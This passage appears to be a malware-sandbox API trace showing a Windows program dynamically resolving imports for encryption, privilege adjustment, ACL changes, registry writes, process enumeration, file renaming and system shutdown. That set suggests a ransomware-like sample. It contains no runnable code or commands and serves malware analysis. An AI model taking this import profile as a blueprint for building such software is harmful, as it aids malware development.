0x0 [0328.026] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.026] SetErrorMode (uMode=0x0) returned 0x8001 [0328.026] GetProcAddress (hModule=0x759c0000, lpProcName="FreeLibrary") returned 0x759d34c8 [0328.026] SetErrorMode (uMode=0x8001) returned 0x0 [0328.026] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.026] SetErrorMode (uMode=0x0) returned 0x8001 [0328.026] GetProcAddress (hModule=0x759c0000, lpProcName="GetModuleHandleW") returned 0x759d34b0 [0328.026] SetErrorMode (uMode=0x8001) returned 0x0 [0328.026] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.026] SetErrorMode (uMode=0x0) returned 0x8001 [0328.026] GetProcAddress (hModule=0x759c0000, lpProcName="GetProcAddress") returned 0x759d1222 [0328.026] SetErrorMode (uMode=0x8001) returned 0x0 [0328.026] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.026] SetErrorMode (uMode=0x0) returned 0x8001 [0328.026] GetProcAddress (hModule=0x759c0000, lpProcName="LoadLibraryW") returned 0x759d492b [0328.026] SetErrorMode (uMode=0x8001) returned 0x0 [0328.026] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.026] SetErrorMode (uMode=0x0) returned 0x8001 [0328.027] GetProcAddress (hModule=0x759c0000, lpProcName="Process32FirstW") returned 0x759f8baf [0328.027] SetErrorMode (uMode=0x8001) returned 0x0 [0328.027] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.027] SetErrorMode (uMode=0x0) returned 0x8001 [0328.027] GetProcAddress (hModule=0x759c0000, lpProcName="Process32NextW") returned 0x759f896c [0328.027] SetErrorMode (uMode=0x8001) returned 0x0 [0328.027] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.027] SetErrorMode (uMode=0x0) returned 0x8001 [0328.027] GetProcAddress (hModule=0x759c0000, lpProcName="GetLastError") returned 0x759d11c0 [0328.027] SetErrorMode (uMode=0x8001) returned 0x0 [0328.027] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.027] SetErrorMode (uMode=0x0) returned 0x8001 [0328.027] GetProcAddress (hModule=0x759c0000, lpProcName="CreateToolhelp32Snapshot") returned 0x759f735f [0328.027] SetErrorMode (uMode=0x8001) returned 0x0 [0328.027] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.027] SetErrorMode (uMode=0x0) returned 0x8001 [0328.027] GetProcAddress (hModule=0x759c0000, lpProcName="CreateFileW") returned 0x759d3f5c [0328.027] SetErrorMode (uMode=0x8001) returned 0x0 [0328.028] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.028] SetErrorMode (uMode=0x0) returned 0x8001 [0328.028] GetProcAddress (hModule=0x759c0000, lpProcName="CreateMutexW") returned 0x759d424c [0328.028] SetErrorMode (uMode=0x8001) returned 0x0 [0328.028] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.028] SetErrorMode (uMode=0x0) returned 0x8001 [0328.028] GetProcAddress (hModule=0x759c0000, lpProcName="ResetEvent") returned 0x759d16dd [0328.028] SetErrorMode (uMode=0x8001) returned 0x0 [0328.028] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.028] SetErrorMode (uMode=0x0) returned 0x8001 [0328.028] GetProcAddress (hModule=0x759c0000, lpProcName="CloseHandle") returned 0x759d1410 [0328.028] SetErrorMode (uMode=0x8001) returned 0x0 [0328.028] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.028] SetErrorMode (uMode=0x0) returned 0x8001 [0328.028] GetProcAddress (hModule=0x759c0000, lpProcName="SetEvent") returned 0x759d16c5 [0328.029] SetErrorMode (uMode=0x8001) returned 0x0 [0328.029] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.029] SetErrorMode (uMode=0x0) returned 0x8001 [0328.029] GetProcAddress (hModule=0x759c0000, lpProcName="Sleep") returned 0x759d10ff [0328.029] SetErrorMode (uMode=0x8001) returned 0x0 [0328.029] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.029] SetErrorMode (uMode=0x0) returned 0x8001 [0328.029] GetProcAddress (hModule=0x759c0000, lpProcName="CreateEventW") returned 0x759d183e [0328.029] SetErrorMode (uMode=0x8001) returned 0x0 [0328.029] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.029] SetErrorMode (uMode=0x0) returned 0x8001 [0328.029] GetProcAddress (hModule=0x759c0000, lpProcName="WaitForSingleObject") returned 0x759d1136 [0328.029] SetErrorMode (uMode=0x8001) returned 0x0 [0328.029] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.029] SetErrorMode (uMode=0x0) returned 0x8001 [0328.029] GetProcAddress (hModule=0x759c0000, lpProcName="WaitForMultipleObjects") returned 0x759d4220 [0328.029] SetErrorMode (uMode=0x8001) returned 0x0 [0328.029] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.030] SetErrorMode (uMode=0x0) returned 0x8001 [0328.030] GetProcAddress (hModule=0x759c0000, lpProcName="GetTickCount") returned 0x759d110c [0328.030] SetErrorMode (uMode=0x8001) returned 0x0 [0328.030] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759c0000 [0328.030] SetErrorMode (uMode=0x0) returned 0x8001 [0328.030] GetProcAddress (hModule=0x759c0000, lpProcName="VirtualFree") returned 0x759d186e [0328.030] SetErrorMode (uMode=0x8001) returned 0x0 [0328.030] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x758c0000 [0328.030] SetErrorMode (uMode=0x0) returned 0x8001 [0328.030] GetProcAddress (hModule=0x758c0000, lpProcName="GetIconInfo") returned 0x758e49ea [0328.030] SetErrorMode (uMode=0x8001) returned 0x0 [0328.030] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x758c0000 [0328.030] SetErrorMode (uMode=0x0) returned 0x8001 [0328.030] GetProcAddress (hModule=0x758c0000, lpProcName="DrawIcon") returned 0x758e8deb [0328.030] SetErrorMode (uMode=0x8001) returned 0x0 [0328.030] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x758c0000 [0328.031] SetErrorMode (uMode=0x0) returned 0x8001 [0328.031] GetProcAddress (hModule=0x758c0000, lpProcName="LoadImageW") returned 0x758dfbd1 [0328.031] SetErrorMode (uMode=0x8001) returned 0x0 [0328.031] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x758c0000 [0328.031] SetErrorMode (uMode=0x0) returned 0x8001 [0328.031] GetProcAddress (hModule=0x758c0000, lpProcName="GetCursorPos") returned 0x758e1218 [0328.031] SetErrorMode (uMode=0x8001) returned 0x0 [0328.031] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x758c0000 [0328.031] SetErrorMode (uMode=0x0) returned 0x8001 [0328.031] GetProcAddress (hModule=0x758c0000, lpProcName="DefWindowProcW") returned 0x77ce25dd [0328.031] SetErrorMode (uMode=0x8001) returned 0x0 [0328.031] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x758c0000 [0328.031] SetErrorMode (uMode=0x0) returned 0x8001 [0328.031] GetProcAddress (hModule=0x758c0000, lpProcName="CreateWindowExW") returned 0x758d8a29 [0328.031] SetErrorMode (uMode=0x8001) returned 0x0 [0328.031] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x758c0000 [0328.031] SetErrorMode (uMode=0x0) returned 0x8001 [0328.032] GetProcAddress (hModule=0x758c0000, lpProcName="UnregisterClassW") returned 0x758d9f84 [0328.032] SetErrorMode (uMode=0x8001) returned 0x0 [0328.032] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x758c0000 [0328.032] SetErrorMode (uMode=0x0) returned 0x8001 [0328.032] GetProcAddress (hModule=0x758c0000, lpProcName="GetKeyboardLayoutList") returned 0x758e2e69 [0328.032] SetErrorMode (uMode=0x8001) returned 0x0 [0328.032] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x758c0000 [0328.032] SetErrorMode (uMode=0x0) returned 0x8001 [0328.032] GetProcAddress (hModule=0x758c0000, lpProcName="CharLowerA") returned 0x758e3e75 [0328.032] SetErrorMode (uMode=0x8001) returned 0x0 [0328.032] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x758c0000 [0328.032] SetErrorMode (uMode=0x0) returned 0x8001 [0328.032] GetProcAddress (hModule=0x758c0000, lpProcName="CharToOemW") returned 0x75931a26 [0328.032] SetErrorMode (uMode=0x8001) returned 0x0 [0328.032] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x758c0000 [0328.032] SetErrorMode (uMode=0x0) returned 0x8001 [0328.032] GetProcAddress (hModule=0x758c0000, lpProcName="TranslateMessage") returned 0x758d7809 [0328.032] SetErrorMode (uMode=0x8001) returned 0x0 [0328.032] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x758c0000 [0328.033] SetErrorMode (uMode=0x0) returned 0x8001 [0328.033] GetProcAddress (hModule=0x758c0000, lpProcName="PeekMessageW") returned 0x758e05ba [0328.033] SetErrorMode (uMode=0x8001) returned 0x0 [0328.033] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x758c0000 [0328.033] SetErrorMode (uMode=0x0) returned 0x8001 [0328.033] GetProcAddress (hModule=0x758c0000, lpProcName="DispatchMessageW") returned 0x758d787b [0328.033] SetErrorMode (uMode=0x8001) returned 0x0 [0328.033] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x758c0000 [0328.033] SetErrorMode (uMode=0x0) returned 0x8001 [0328.033] GetProcAddress (hModule=0x758c0000, lpProcName="MsgWaitForMultipleObjects") returned 0x758e0b4a [0328.033] SetErrorMode (uMode=0x8001) returned 0x0 [0328.033] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x758c0000 [0328.033] SetErrorMode (uMode=0x0) returned 0x8001 [0328.033] GetProcAddress (hModule=0x758c0000, lpProcName="RegisterClassExW") returned 0x758db17d [0328.033] SetErrorMode (uMode=0x8001) returned 0x0 [0328.033] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x758c0000 [0328.033] SetErrorMode (uMode=0x0) returned 0x8001 [0328.034] GetProcAddress (hModule=0x758c0000, lpProcName="SetWindowLongA") returned 0x758e6110 [0328.034] SetErrorMode (uMode=0x8001) returned 0x0 [0328.034] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x758c0000 [0328.034] SetErrorMode (uMode=0x0) returned 0x8001 [0328.034] GetProcAddress (hModule=0x758c0000, lpProcName="GetWindowLongA") returned 0x758dd156 [0328.034] SetErrorMode (uMode=0x8001) returned 0x0 [0328.034] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x758c0000 [0328.034] SetErrorMode (uMode=0x0) returned 0x8001 [0328.034] GetProcAddress (hModule=0x758c0000, lpProcName="CharUpperW") returned 0x758df350 [0328.034] SetErrorMode (uMode=0x8001) returned 0x0 [0328.034] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x758c0000 [0328.034] SetErrorMode (uMode=0x0) returned 0x8001 [0328.034] GetProcAddress (hModule=0x758c0000, lpProcName="DestroyWindow") returned 0x758d9a55 [0328.034] SetErrorMode (uMode=0x8001) returned 0x0 [0328.034] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x76240000 [0328.036] SetErrorMode (uMode=0x0) returned 0x8001 [0328.036] GetProcAddress (hModule=0x76240000, lpProcName="CryptImportPublicKeyInfo") returned 0x76256c0e [0328.036] SetErrorMode (uMode=0x8001) returned 0x0 [0328.036] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x76240000 [0328.036] SetErrorMode (uMode=0x0) returned 0x8001 [0328.036] GetProcAddress (hModule=0x76240000, lpProcName="CryptDecodeObjectEx") returned 0x7624d718 [0328.036] SetErrorMode (uMode=0x8001) returned 0x0 [0328.036] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0328.036] SetErrorMode (uMode=0x0) returned 0x8001 [0328.036] GetProcAddress (hModule=0x77740000, lpProcName="RegCloseKey") returned 0x7775469d [0328.036] SetErrorMode (uMode=0x8001) returned 0x0 [0328.036] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0328.036] SetErrorMode (uMode=0x0) returned 0x8001 [0328.037] GetProcAddress (hModule=0x77740000, lpProcName="GetAce") returned 0x777545f0 [0328.037] SetErrorMode (uMode=0x8001) returned 0x0 [0328.037] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0328.037] SetErrorMode (uMode=0x0) returned 0x8001 [0328.037] GetProcAddress (hModule=0x77740000, lpProcName="CryptEncrypt") returned 0x7776779b [0328.037] SetErrorMode (uMode=0x8001) returned 0x0 [0328.037] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0328.037] SetErrorMode (uMode=0x0) returned 0x8001 [0328.037] GetProcAddress (hModule=0x77740000, lpProcName="GetSidSubAuthorityCount") returned 0x77750e0c [0328.037] SetErrorMode (uMode=0x8001) returned 0x0 [0328.037] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0328.037] SetErrorMode (uMode=0x0) returned 0x8001 [0328.037] GetProcAddress (hModule=0x77740000, lpProcName="AllocateAndInitializeSid") returned 0x777540e6 [0328.037] SetErrorMode (uMode=0x8001) returned 0x0 [0328.037] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0328.037] SetErrorMode (uMode=0x0) returned 0x8001 [0328.037] GetProcAddress (hModule=0x77740000, lpProcName="GetSidSubAuthority") returned 0x77750e24 [0328.037] SetErrorMode (uMode=0x8001) returned 0x0 [0328.038] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0328.038] SetErrorMode (uMode=0x0) returned 0x8001 [0328.038] GetProcAddress (hModule=0x77740000, lpProcName="SetEntriesInAclW") returned 0x77752a66 [0328.038] SetErrorMode (uMode=0x8001) returned 0x0 [0328.038] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0328.038] SetErrorMode (uMode=0x0) returned 0x8001 [0328.038] GetProcAddress (hModule=0x77740000, lpProcName="RegCreateKeyExW") returned 0x777540fe [0328.038] SetErrorMode (uMode=0x8001) returned 0x0 [0328.038] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0328.038] SetErrorMode (uMode=0x0) returned 0x8001 [0328.038] GetProcAddress (hModule=0x77740000, lpProcName="CryptVerifySignatureW") returned 0x7774c54a [0328.038] SetErrorMode (uMode=0x8001) returned 0x0 [0328.038] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0328.038] SetErrorMode (uMode=0x0) returned 0x8001 [0328.038] GetProcAddress (hModule=0x77740000, lpProcName="SetNamedSecurityInfoW") returned 0x77749fe2 [0328.038] SetErrorMode (uMode=0x8001) returned 0x0 [0328.038] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0328.039] SetErrorMode (uMode=0x0) returned 0x8001 [0328.039] GetProcAddress (hModule=0x77740000, lpProcName="GetNamedSecurityInfoW") returned 0x7774f4fd [0328.039] SetErrorMode (uMode=0x8001) returned 0x0 [0328.039] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0328.039] SetErrorMode (uMode=0x0) returned 0x8001 [0328.039] GetProcAddress (hModule=0x77740000, lpProcName="CryptCreateHash") returned 0x7774df4e [0328.039] SetErrorMode (uMode=0x8001) returned 0x0 [0328.039] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0328.039] SetErrorMode (uMode=0x0) returned 0x8001 [0328.039] GetProcAddress (hModule=0x77740000, lpProcName="CryptHashData") returned 0x7774df36 [0328.039] SetErrorMode (uMode=0x8001) returned 0x0 [0328.039] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0328.039] SetErrorMode (uMode=0x0) returned 0x8001 [0328.039] GetProcAddress (hModule=0x77740000, lpProcName="SetSecurityDescriptorSacl") returned 0x77754680 [0328.039] SetErrorMode (uMode=0x8001) returned 0x0 [0328.039] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0328.039] SetErrorMode (uMode=0x0) returned 0x8001 [0328.040] GetProcAddress (hModule=0x77740000, lpProcName="RegSetValueExW") returned 0x777514d6 [0328.040] SetErrorMode (uMode=0x8001) returned 0x0 [0328.040] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0328.040] SetErrorMode (uMode=0x0) returned 0x8001 [0328.040] GetProcAddress (hModule=0x77740000, lpProcName="CryptDestroyHash") returned 0x7774df66 [0328.040] SetErrorMode (uMode=0x8001) returned 0x0 [0328.040] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0328.040] SetErrorMode (uMode=0x0) returned 0x8001 [0328.040] GetProcAddress (hModule=0x77740000, lpProcName="OpenProcessToken") returned 0x77754304 [0328.040] SetErrorMode (uMode=0x8001) returned 0x0 [0328.040] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0328.040] SetErrorMode (uMode=0x0) returned 0x8001 [0328.040] GetProcAddress (hModule=0x77740000, lpProcName="FreeSid") returned 0x7775412e [0328.040] SetErrorMode (uMode=0x8001) returned 0x0 [0328.040] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0328.040] SetErrorMode (uMode=0x0) returned 0x8001 [0328.040] GetProcAddress (hModule=0x77740000, lpProcName="InitializeSecurityDescriptor") returned 0x77754620 [0328.040] SetErrorMode (uMode=0x8001) returned 0x0 [0328.041] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0328.041] SetErrorMode (uMode=0x0) returned 0x8001 [0328.041] GetProcAddress (hModule=0x77740000, lpProcName="RegOpenKeyExW") returned 0x7775468d [0328.041] SetErrorMode (uMode=0x8001) returned 0x0 [0328.041] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0328.041] SetErrorMode (uMode=0x0) returned 0x8001 [0328.041] GetProcAddress (hModule=0x77740000, lpProcName="CryptImportKey") returned 0x7774c532 [0328.041] SetErrorMode (uMode=0x8001) returned 0x0 [0328.041] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0328.041] SetErrorMode (uMode=0x0) returned 0x8001 [0328.041] GetProcAddress (hModule=0x77740000, lpProcName="ConvertStringSecurityDescriptorToSecurityDescriptorW") returned 0x77751f59 [0328.041] SetErrorMode (uMode=0x8001) returned 0x0 [0328.041] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0328.041] SetErrorMode (uMode=0x0) returned 0x8001 [0328.041] GetProcAddress (hModule=0x77740000, lpProcName="OpenThreadToken") returned 0x7775432c [0328.041] SetErrorMode (uMode=0x8001) returned 0x0 [0328.041] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0328.042] SetErrorMode (uMode=0x0) returned 0x8001 [0328.042] GetProcAddress (hModule=0x77740000, lpProcName="RegQueryValueExW") returned 0x777546ad [0328.042] SetErrorMode (uMode=0x8001) returned 0x0 [0328.042] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0328.042] SetErrorMode (uMode=0x0) returned 0x8001 [0328.042] GetProcAddress (hModule=0x77740000, lpProcName="CryptReleaseContext") returned 0x7774e124 [0328.042] SetErrorMode (uMode=0x8001) returned 0x0 [0328.042] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0328.042] SetErrorMode (uMode=0x0) returned 0x8001 [0328.042] GetProcAddress (hModule=0x77740000, lpProcName="GetTokenInformation") returned 0x7775431c [0328.042] SetErrorMode (uMode=0x8001) returned 0x0 [0328.042] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0328.042] SetErrorMode (uMode=0x0) returned 0x8001 [0328.042] GetProcAddress (hModule=0x77740000, lpProcName="CryptDestroyKey") returned 0x7774c51a [0328.042] SetErrorMode (uMode=0x8001) returned 0x0 [0328.042] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0328.042] SetErrorMode (uMode=0x0) returned 0x8001 [0328.043] GetProcAddress (hModule=0x77740000, lpProcName="AdjustTokenPrivileges") returned 0x7775418e [0328.043] SetErrorMode (uMode=0x8001) returned 0x0 [0328.043] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0328.043] SetErrorMode (uMode=0x0) returned 0x8001 [0328.043] GetProcAddress (hModule=0x77740000, lpProcName="SetSecurityDescriptorDacl") returned 0x7775415e [0328.043] SetErrorMode (uMode=0x8001) returned 0x0 [0328.043] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0328.043] SetErrorMode (uMode=0x0) returned 0x8001 [0328.043] GetProcAddress (hModule=0x77740000, lpProcName="GetSecurityDescriptorSacl") returned 0x77754608 [0328.043] SetErrorMode (uMode=0x8001) returned 0x0 [0328.043] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0328.043] SetErrorMode (uMode=0x0) returned 0x8001 [0328.043] GetProcAddress (hModule=0x77740000, lpProcName="LookupPrivilegeValueW") returned 0x777541b3 [0328.043] SetErrorMode (uMode=0x8001) returned 0x0 [0328.043] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0328.043] SetErrorMode (uMode=0x0) returned 0x8001 [0328.043] GetProcAddress (hModule=0x77740000, lpProcName="GetLengthSid") returned 0x7775413b [0328.043] SetErrorMode (uMode=0x8001) returned 0x0 [0328.044] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0328.044] SetErrorMode (uMode=0x0) returned 0x8001 [0328.044] GetProcAddress (hModule=0x77740000, lpProcName="RegDeleteValueW") returned 0x7774cf31 [0328.044] SetErrorMode (uMode=0x8001) returned 0x0 [0328.044] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0328.044] SetErrorMode (uMode=0x0) returned 0x8001 [0328.044] GetProcAddress (hModule=0x77740000, lpProcName="RegFlushKey") returned 0x7776773f [0328.044] SetErrorMode (uMode=0x8001) returned 0x0 [0328.044] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0328.044] SetErrorMode (uMode=0x0) returned 0x8001 [0328.044] GetProcAddress (hModule=0x77740000, lpProcName="RegNotifyChangeKeyValue") returned 0x7774e15b [0328.044] SetErrorMode (uMode=0x8001) returned 0x0 [0328.044] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0328.044] SetErrorMode (uMode=0x0) returned 0x8001 [0328.044] GetProcAddress (hModule=0x77740000, lpProcName="RegQueryInfoKeyW") returned 0x777546e7 [0328.044] SetErrorMode (uMode=0x8001) returned 0x0 [0328.044] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0328.045] SetErrorMode (uMode=0x0) returned 0x8001 [0328.045] GetProcAddress (hModule=0x77740000, lpProcName="RegEnumKeyW") returned 0x7775445b [0328.045] SetErrorMode (uMode=0x8001) returned 0x0 [0328.045] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0328.045] SetErrorMode (uMode=0x0) returned 0x8001 [0328.045] GetProcAddress (hModule=0x77740000, lpProcName="InitiateSystemShutdownExW") returned 0x7779db3a [0328.045] SetErrorMode (uMode=0x8001) returned 0x0 [0328.045] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0328.045] SetErrorMode (uMode=0x0) returned 0x8001 [0328.045] GetProcAddress (hModule=0x77740000, lpProcName="CryptAcquireContextW") returned 0x7774df14 [0328.045] SetErrorMode (uMode=0x8001) returned 0x0 [0328.045] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x76a70000 [0328.045] SetErrorMode (uMode=0x0) returned 0x8001 [0328.045] GetProcAddress (hModule=0x76a70000, lpProcName="ShellExecuteW") returned 0x76a83c71 [0328.045] SetErrorMode (uMode=0x8001) returned 0x0 [0328.045] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x76a70000 [0328.045] SetErrorMode (uMode=0x0) returned 0x8001 [0328.046] GetProcAddress (hModule=0x76a70000, lpProcName="ShellExecuteExW") returned 0x76a91e46 [0328.046] SetErrorMode (uMode=0x8001) returned 0x0 [0328.046] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x76a70000 [0328.046] SetErrorMode (uMode=0x0) returned 0x8001 [0328.046] GetProcAddress (hModule=0x76a70000, lpProcName="SHGetFolderPathW") returned 0x76af5708 [0328.046] SetErrorMode (uMode=0x8001) returned 0x0 [0328.046] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76370000 [0328.046] SetErrorMode (uMode=0x0) returned 0x8001 [0328.046] GetProcAddress (hModule=0x76370000, lpProcName="PathFileExistsW") returned 0x763845bf [0328.046] SetErrorMode (uMode=0x8001) returned 0x0 [0328.046] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76370000 [0328.046] SetErrorMode (uMode=0x0) returned 0x8001 [0328.046] GetProcAddress (hModule=0x76370000, lpProcName="PathIsURLW") returned 0x763855bf [0328.046] SetErrorMode (uMode=0x8001) returned 0x0 [0328.046] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76370000 [0328.046] SetErrorMode (uMode=0x0) returned 0x8001 [0328.047] GetProcAddress (hModule=0x76370000, lpProcName="PathIsDirectoryEmptyW") returned 0x763acd81 [0328.047] SetErrorMode (uMode=0x8001) returned 0x0 [0328.047] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76370000 [0328.047] SetErrorMode (uMode=0x0) returned 0x8001 [0328.047] GetProcAddress (hModule=0x76370000, lpProcName="StrCmpNIW") returned 0x76384745 [0328.047] SetErrorMode (uMode=0x8001) returned 0x0 [0328.047] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76370000 [0328.047] SetErrorMode (uMode=0x0) returned 0x8001 [0328.047] GetProcAddress (hModule=0x76370000, lpProcName="PathRenameExtensionW") returned 0x763ad32a [0328.047] SetErrorMode (uMode=0x8001) returned 0x0 [0328.047] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76370000 [0328.047] SetErrorMode (uMode=0x0) returned 0x8001 [0328.047] GetProcAddress (hModule=0x76370000, lpProcName="StrStrIW") returned 0x763846e9 [0328.047] SetErrorMode (uMode=0x8001) returned 0x0 [0328.047] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76370000 [0328.047] SetErrorMode (uMode=0x0) returned 0x8001 [0328.047] GetProcAddress (hModule=0x76370000, lpProcName="PathMatchSpecW") returned 0x763886f7 [0328.047] SetErrorMode (uMode=0x8001) returned 0x0 [0328.048] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76370000 [0328.048] SetErrorMode (uMode=0x0) returned 0x8001 [0328.048] GetProcAddress (hModule=0x76370000, lpProcName="PathCombineW") returned 0x7638c39c [0328.048] SetErrorMode (uMode=0x8001) returned 0x0 [0328.048] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76370000 [0328.048] SetErrorMode (uMode=0x0) returned 0x8001 [0328.048] GetProcAddress (hModule=0x76370000, lpProcName="PathRemoveFileSpecW") returned 0x76383248 [0328.048] SetErrorMode (uMode=0x8001) returned 0x0 [0328.048] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76370000 [0328.048] SetErrorMode (uMode=0x0) returned 0x8001 [0328.048] GetProcAddress (hModule=0x76370000, lpProcName="PathAddBackslashW") returned 0x7638c177 [0328.048] SetErrorMode (uMode=0x8001) returned 0x0 [0328.048] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76370000 [0328.048] SetErrorMode (uMode=0x0) returned 0x8001 [0328.048] GetProcAddress (hModule=0x76370000, lpProcName="wvnsprintfW") returned 0x763b066c [0328.048] SetErrorMode (uMode=0x8001) returned 0x0 [0328.048] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76370000 [0328.048] SetErrorMode (uMode=0x0) returned 0x8001 [0328.049] GetProcAddress (hModule=0x76370000, lpProcName="PathUnquoteSpacesW") returned 0x76385331 [0328.049] SetErrorMode (uMode=0x8001) returned 0x0 [0328.049] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76370000 [0328.049] SetErrorMode (uMode=0x0) returned 0x8001 [0328.049] GetProcAddress (hModule=0x76370000, lpProcName="PathSkipRootW") returned 0x7639fbf5 [0328.049] SetErrorMode (uMode=0x8001) returned 0x0 [0328.049] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76370000 [0328.049] SetErrorMode (uMode=0x0) returned 0x8001 [0328.049] GetProcAddress (hModule=0x76370000, lpProcName="PathFindExtensionW") returned 0x7638a1b9 [0328.049] SetErrorMode (uMode=0x8001) returned 0x0 [0328.049] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76370000 [0328.049] SetErrorMode (uMode=0x0) returned 0x8001 [0328.049] GetProcAddress (hModule=0x76370000, lpProcName="SHDeleteValueW") returned 0x7637fcca [0328.049] SetErrorMode (uMode=0x8001) returned 0x0 [0328.049] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76370000 [0328.049] SetErrorMode (uMode=0x0) returned 0x8001 [0328.049] GetProcAddress (hModule=0x76370000, lpProcName="wvnsprintfA") returned 0x7639edfe [0328.050] SetErrorMode (uMode=0x8001) returned 0x0 [0328.050] LoadLibraryA (lpLibFileName="SHLWAPI.dll") 